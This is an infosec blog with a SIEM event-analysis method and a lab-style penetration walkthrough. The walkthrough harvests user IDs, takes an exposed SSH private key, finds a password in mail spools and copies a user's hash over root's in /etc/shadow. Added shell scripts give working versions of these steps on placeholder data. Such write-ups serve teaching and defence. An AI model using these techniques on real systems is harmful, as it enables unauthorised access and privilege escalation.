Wednesday, December 19, 2012

Great talk from Derbycon 2012


Some great advice from John Woods about managing an infosec team


Friday, October 26, 2012

The Analytical Process




Maybe I have watched too many episodes of Sherlock on the BBC, or I really am too left-brained for my own good. Either way, I wanted to write a post that serves as a quick visual and written overview of how to analyze security events. The steps can be applied to just about anything, from fixing a problem on your car to investigating a murder. They are based loosely on Sniper Forensics by Chris Pogue.

The 4 principles of analysis, based on the Alexiou Principle

  1. What question are you trying to answer?
  2. What data do you need to answer that question?
  3. Where do you go for the data?
  4. What does the data tell you?


“When selecting a hypothesis, the one that makes the fewest number of new assumptions is more likely to be correct.” -  Occam’s Razor



9 steps for analyzing events

  1. Define normal
  2. Recognize abnormal
  3. Question
  4. Study the attacker
  5. Study the target
  6. Analyze the data
  7. Discard the irrelevant data
  8. Apply logic
  9. Provide analysis

  
The 9 steps in detail


1. Define Normal
Determine what normal messages, events and alerts look like in the SIEM.

2. Recognize Abnormal
Once you can recognize normal traffic, you can filter it out. Anything left over is abnormal and worth investigating.

3. Question
What event or message are you seeing? Why is it abnormal? Who is the attacker? Who is the target? When did it occur?

4. Study the Attacker
Who is the attacker? What can we find out about them? What are they doing?

5. Study the Target
Is the target system compromised? Is it behaving suspiciously? Is there abnormal traffic originating from it? What OS and applications is it running?

6. Analyze Data
What do our logs and packet captures show? What was found online? What vulnerability were they attempting to exploit?

7. Discard Irrelevant Data
What's not needed? Get rid of useless facts and noise.

8. Apply Logic
What does the data tell us? Let the data form the hypothesis; don't disregard data to protect an assumption.

9. Provide Analysis
What did the data show? Was there an incident or a false positive? Build your analysis on as many facts as possible.
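As an added example (not part of the original post), here are steps 1, 2, 7 and 9 applied to a handful of constructed sshd log lines of the kind a SIEM would forward: a baseline defines normal, everything that is not an authentication outcome is discarded, whatever is left is abnormal, and the remainder is summarised per source for the analyst. The host, accounts, addresses and the baseline itself are assumptions made up for this example.

```shell
#!/bin/sh
# Added example (not part of the original post): steps 1, 2, 7 and 9 applied
# to constructed sshd log lines as a SIEM would forward them. Host, accounts,
# addresses and the baseline are all assumptions made up for the example.

read_events() {
cat <<'EOF'
Oct 26 08:02:11 web01 sshd[2211]: Accepted publickey for deploy from 10.0.5.20 port 51022 ssh2
Oct 26 08:15:43 web01 sshd[2290]: Accepted publickey for deploy from 10.0.5.20 port 51100 ssh2
Oct 26 09:01:05 web01 CRON[2400]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 26 12:44:09 web01 sshd[3102]: Accepted password for pirrip from 198.51.100.7 port 40122 ssh2
Oct 26 12:44:20 web01 sshd[3103]: Failed password for invalid user admin from 198.51.100.7 port 40125 ssh2
Oct 26 12:44:30 web01 sshd[3104]: Failed password for root from 198.51.100.7 port 40130 ssh2
Oct 26 13:10:00 web01 sshd[3200]: Accepted publickey for deploy from 10.0.5.21 port 51300 ssh2
EOF
}

# Step 1, define normal: on this host the only expected logins are the
# deploy account, by key, from the 10.0.5.0/24 management network (BASELINE).
# Step 7, discard irrelevant: anything that is not an sshd auth outcome.
# Step 2, recognize abnormal: whatever survives both filters, printed as
# "<outcome> <method> <user> <src>" for the analyst to question.
recognize_abnormal() {
  read_events | awk '
    $5 !~ /^sshd\[/                    { next }   # step 7: cron and other noise
    $6 != "Accepted" && $6 != "Failed" { next }   # step 7: not an auth outcome
    {
      method = $7
      if ($9 == "invalid") { user = $11; src = $13 }  # "for invalid user X from"
      else                 { user = $9;  src = $11 }  # "for X from"
    }
    # BASELINE (step 1): drop what we defined as normal
    method == "publickey" && user == "deploy" && src ~ /^10\.0\.5\.[0-9]+$/ { next }
    { print $6, method, user, src }                 # step 2: abnormal, keep
  '
}

# Step 9, provide analysis: one line per source so the story is visible,
# here a password-guessing source that eventually got in as pirrip.
summarize_by_source() {
  recognize_abnormal | awk '
    { n[$4]++; if ($1 == "Accepted") ok[$4]++ }
    END { for (s in n) printf "%s attempts=%d accepted=%d\n", s, n[s], ok[s] + 0 }
  ' | sort
}

count_abnormal() { recognize_abnormal | awk 'END { print NR }'; }

echo "abnormal events:"; recognize_abnormal
echo "by source:";       summarize_by_source
```

The baseline is deliberately a tuple (method, account, source network) rather than a single field: a key login by deploy from an unknown network, or a password login by deploy from the management network, would both fall out of the baseline and be surfaced, which is the point of step 2.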
 

Thursday, April 7, 2011

Step 5 - Escalation

Now that we're on the target we need to escalate to root privileges. The first step was to edit that shadow file.

Now you can run John against the hash, or you can simply copy pirrip's hash over root's entry, so that root's password becomes the one we already know. That is what I did in this example.

Let's see if it works.
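The hash-copy trick above, as an added example that is not the post's own commands: it swaps pirrip's hash into root's entry on a scratch copy of a shadow file, so the live file is never touched and the original is kept for comparison. The shadow contents and hash strings are constructed placeholders shaped like real entries, not real hashes.

```shell
#!/bin/sh
# Added example (not the post's own commands): the escalation step above,
# copying pirrip's password hash over root's in a shadow file, done on a
# scratch copy. The entries below are constructed; the hash strings are
# placeholders shaped like real ones, not real hashes.
#
# The alternative the post mentions, cracking instead of copying, would be:
#   unshadow /etc/passwd /etc/shadow > hashes && john hashes

make_sample_shadow() {  # $1 = path to write
cat >"$1" <<'EOF'
root:$1$AAAAAAAA$rootrootrootrootrootro:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
pirrip:$1$BBBBBBBB$pirrippirrippirrippirr:15000:0:99999:7:::
havisham:$1$CCCCCCCC$havishamhavishamhavis:15000:0:99999:7:::
magwitch:$1$DDDDDDDD$magwitchmagwitchmagwi:15000:0:99999:7:::
EOF
}

# Field 2 (the hash) of one user's shadow entry.
hash_of() {  # $1 = user, $2 = shadow file
  awk -F: -v u="$1" '$1 == u { print $2; exit }' "$2"
}

# Write $3 to $4 with the hash of user $2 replaced by the hash of user $1.
# Only field 2 changes; the password-aging fields are left as they were.
# A locked or empty source hash ("*", "!...") would lock the target instead
# of opening it, so refuse those up front.
copy_hash() {  # $1 = source user, $2 = target user, $3 = shadow in, $4 = shadow out
  src_hash=$(hash_of "$1" "$3")
  case "$src_hash" in
    ''|'*'|'!'*) echo "$1 has no usable hash" >&2; return 1 ;;
  esac
  awk -F: -v OFS=: -v t="$2" -v h="$src_hash" '$1 == t { $2 = h } { print }' "$3" >"$4"
}

# Demo on a scratch copy only.
demo() {
  d=$(mktemp -d)
  make_sample_shadow "$d/shadow"
  copy_hash pirrip root "$d/shadow" "$d/shadow.new"
  echo "root before: $(hash_of root "$d/shadow")"
  echo "root after:  $(hash_of root "$d/shadow.new")"
  rm -rf "$d"
}
demo
```

Two things worth keeping in mind when doing this for real: the file must stay one line per account with exactly nine colon-separated fields, and the copied hash is only useful because the plaintext behind it is known, so a later root login using pirrip's password is what confirms the edit took.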

Step 4 - Penetration

We successfully logged in using pirrip's RSA key pair. Let's take a look at the /etc/passwd file for fun.

Notice that pirrip is in a different group from magwitch and havisham. From here I was stuck for a little while. I tried unsuccessfully to download the /etc/shadow file over ssh.

So I decided to start looking around the box for interesting directories or files, and ended up in the /var/mail directory.

Hmm, email. Maybe there's some good stuff in there...

Hey, check that out, there's pirrip's password!
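Added example, not from the original post: the two looks around the box described above, reading /etc/passwd to see who has a real shell and which group they are in, then sweeping /var/mail for anything that mentions a password, run offline against constructed copies in a scratch directory. The account names follow the post; the UIDs, GIDs, shells, mail contents and the password string in them are made up for the example.

```shell
#!/bin/sh
# Added example (not the post's own commands): the two looks around the box
# described above, run offline against constructed copies in a scratch
# directory. Account names follow the post; UIDs, GIDs, shells, the mail and
# the password string in it are made up for the example.

make_box() {  # $1 = scratch root standing in for /
  mkdir -p "$1/etc" "$1/var/mail"
cat >"$1/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/false
pirrip:x:1000:1000:Philip Pirrip:/home/pirrip:/bin/bash
havisham:x:1001:100:Estella Havisham:/home/havisham:/bin/bash
magwitch:x:1002:100:Abel Magwitch:/home/magwitch:/bin/bash
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
EOF
cat >"$1/var/mail/pirrip" <<'EOF'
From havisham@example.com Mon Apr  4 09:12:00 2011
Subject: server access

Pip, the box is up. Password for your account is 0range-Sunsh1ne; change it when you log in.
EOF
cat >"$1/var/mail/magwitch" <<'EOF'
From root@example.com Mon Apr  4 10:00:00 2011
Subject: cron output

nothing to report
EOF
}

# Accounts with a usable shell, as "user uid gid". System accounts with
# /bin/false or nologin are skipped; what is left shows the group split the
# post noticed (pirrip alone in gid 1000, havisham and magwitch in gid 100).
login_accounts() {  # $1 = passwd file
  awk -F: '$7 !~ /\/(false|nologin)$/ { print $1, $3, $4 }' "$1"
}

# Spools in the mail directory that mention a password, by mailbox owner.
# On the real box you only see the spools your user is allowed to read.
spools_with_passwords() {  # $1 = mail spool directory
  grep -ilE 'passw(or)?d' "$1"/* 2>/dev/null | sed 's|.*/||'
}

demo() {
  d=$(mktemp -d)
  make_box "$d"
  echo "accounts with a shell:";  login_accounts "$d/etc/passwd"
  echo "spools worth reading:";   spools_with_passwords "$d/var/mail"
  rm -rf "$d"
}
demo
```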

Step 3 - Enumeration continued

I didn't know you had to do this manually, but Nikto wouldn't scan the user directories on its own; I had to specify them with the -r switch.

Nothing too interesting there; let's move on to the next user.

Look at that! Pirrip's .ssh directory is exposed. Let's browse to it and see what's there.

Wow, we can download the user's private and public keys. Remember our Nmap results from earlier? The server is running OpenSSH, and this is an RSA key pair for SSH public-key authentication: the server accepts a login when the client proves it holds the private key matching a public key listed for that account, so no password is ever asked for. That is why an attacker getting hold of your private key is very, very bad: they can assume your identity and log in as you (a passphrase on the key only buys time, since it can be attacked offline). Let's grab those RSA keys.

I downloaded both keys and put them in my ~/.ssh directory. We need to chmod the files so they have the correct permissions: ssh ignores a private key that is readable by anyone other than its owner.

Now let's try to log in using pirrip's keys.
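Added example, not the post's own commands: staging the downloaded key pair with the modes OpenSSH insists on (700 on the directory, 600 on the private key; a private key that group or others can read is reported as "UNPROTECTED PRIVATE KEY FILE!" and ignored by ssh), with the permission check split out so it can be run before the login attempt. The key contents are placeholders, and the key name and target address are assumptions.

```shell
#!/bin/sh
# Added example (not the post's own commands): putting a downloaded key pair
# where ssh will use it. ssh refuses a private key whose mode lets group or
# others read it ("UNPROTECTED PRIVATE KEY FILE! ... This private key will be
# ignored"), so the mode fix is not optional. Key contents below are
# placeholders; the key name and target host are assumptions.

stage_key() {  # $1 = dir used as ~/.ssh, $2 = downloaded private key, $3 = public key, $4 = name
  mkdir -p "$1" || return 1
  chmod 700 "$1"                 # ~/.ssh must not be group/world accessible
  cp "$2" "$1/$4" || return 1
  chmod 600 "$1/$4"              # private key: owner read/write only
  cp "$3" "$1/$4.pub" || return 1
  chmod 644 "$1/$4.pub"          # public half may stay world-readable
}

# 0 when no group/other permission bits are set, the same test ssh applies.
# Reads the ls mode string so it behaves the same on GNU and BSD userland.
key_perms_ok() {  # $1 = private key path
  [ "$(ls -l "$1" | cut -c5-10)" = "------" ]
}

# The login step from the post, with the check in front of it. Kept in a
# function so running this file offline never tries to reach a host.
login_with_key() {  # $1 = private key, $2 = user@host, e.g. pirrip@<target .101>
  key_perms_ok "$1" || { echo "refusing: run chmod 600 $1 first" >&2; return 1; }
  ssh -i "$1" -o IdentitiesOnly=yes "$2"   # IdentitiesOnly: offer only this key
}

demo() {
  d=$(mktemp -d)
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'PLACEHOLDER' '-----END RSA PRIVATE KEY-----' >"$d/id_rsa"
  printf '%s\n' 'ssh-rsa PLACEHOLDER pirrip' >"$d/id_rsa.pub"
  chmod 644 "$d/id_rsa"          # what a browser download typically leaves behind
  key_perms_ok "$d/id_rsa" || echo "as downloaded: too open, ssh would ignore it"
  stage_key "$d/ssh" "$d/id_rsa" "$d/id_rsa.pub" pirrip_rsa
  key_perms_ok "$d/ssh/pirrip_rsa" && echo "staged: ssh -i $d/ssh/pirrip_rsa pirrip@<target .101>"
  rm -rf "$d"
}
demo
```

IdentitiesOnly=yes matters on a box with several keys loaded: without it ssh may offer every agent key first, and a target that limits authentication attempts can lock the session out before the stolen key is ever tried.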

Step 3 - Enumeration

Now that we know there are web servers and other services running, let's see what we can find out about them.

We can use wget to download that page to our box so we can extract the email addresses from it.

Let's cut that file so it shows only the user IDs.

Great! Now we have user IDs to test with. I also ran Nikto against this host to see what we could find out.

Nikto shows that this server might allow directory indexing. I used Dirbuster to see what I could find.

Dirbuster didn't return anything interesting when I scanned the .100 target, but look what it showed on the .101 box.

It looks like the user ID list we made earlier wasn't entirely accurate: a mail address on the page is not necessarily a local account. I edited the list down to only the names found in the Dirbuster report: pirrip, havisham, magwitch.

I tried browsing the ~pirrip directory on the web server, but no files were found.
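Added example, not the post's own commands: the harvest-and-cut step above and the later correction against Dirbuster's findings, run against a constructed stand-in for the downloaded page and a constructed Dirbuster listing (the real page and report exist only in the missing screenshots). The three names match the post; the addresses, the extra entries and the paths are assumptions.

```shell
#!/bin/sh
# Added example (not the post's own commands): harvesting user IDs from the
# downloaded page and then trimming the list to the /~user/ directories
# Dirbuster confirmed. The page and the Dirbuster listing are constructed
# stand-ins for the screenshots; only the three names come from the post.

make_inputs() {  # $1 = scratch directory for the constructed files
cat >"$1/index.html" <<'EOF'
<html><body><h1>Staff</h1>
<p>Philip Pirrip - <a href="mailto:pirrip@example.com">pirrip@example.com</a></p>
<p>Estella Havisham - havisham@example.com</p>
<p>Abel Magwitch - MAGWITCH@example.com</p>
<p>Webmaster: webmaster@example.com</p>
<p>Sales: Sales@Example.com</p>
</body></html>
EOF
# Dirbuster-style list of paths that answered 200; only /~user/ ones matter.
cat >"$1/dirbuster.txt" <<'EOF'
/~pirrip/
/~havisham/
/~magwitch/
/~pirrip/.ssh/
/icons/
EOF
}

# The wget + cut step: every e-mail address on the saved page, reduced to the
# local part, lower-cased and de-duplicated. Live, the input file comes from
#   wget -O index.html http://<target .100>/
candidate_userids() {  # $1 = saved html
  grep -oiE '[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}' "$1" \
    | cut -d@ -f1 | tr 'A-Z' 'a-z' | sort -u
}

# The correction: a mailbox is not an account, so keep only candidates that
# also showed up as /~user/ directories in the Dirbuster report.
confirmed_userids() {  # $1 = saved html, $2 = dirbuster report
  {
    sed -n 's|^/~\([^/]*\)/.*|\1|p' "$2" | sort -u
    candidate_userids "$1"
  } | sort | uniq -d      # both inputs are unique, so duplicates = intersection
}

demo() {
  d=$(mktemp -d)
  make_inputs "$d"
  echo "candidates from the page:"; candidate_userids "$d/index.html"
  echo "confirmed by Dirbuster:";   confirmed_userids "$d/index.html" "$d/dirbuster.txt"
  rm -rf "$d"
}
demo
```

Keeping the two lists separate is deliberate: the raw candidates (here including webmaster and sales) are still worth a password-guessing pass against other services, while the confirmed set is the one to spend time on for the web server itself.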

Step 2 - Scanning

Let's take a closer look at the .100 and .101 boxes.

I forgot to take a screen capture of the .101 box, but it was running Apache on port 80.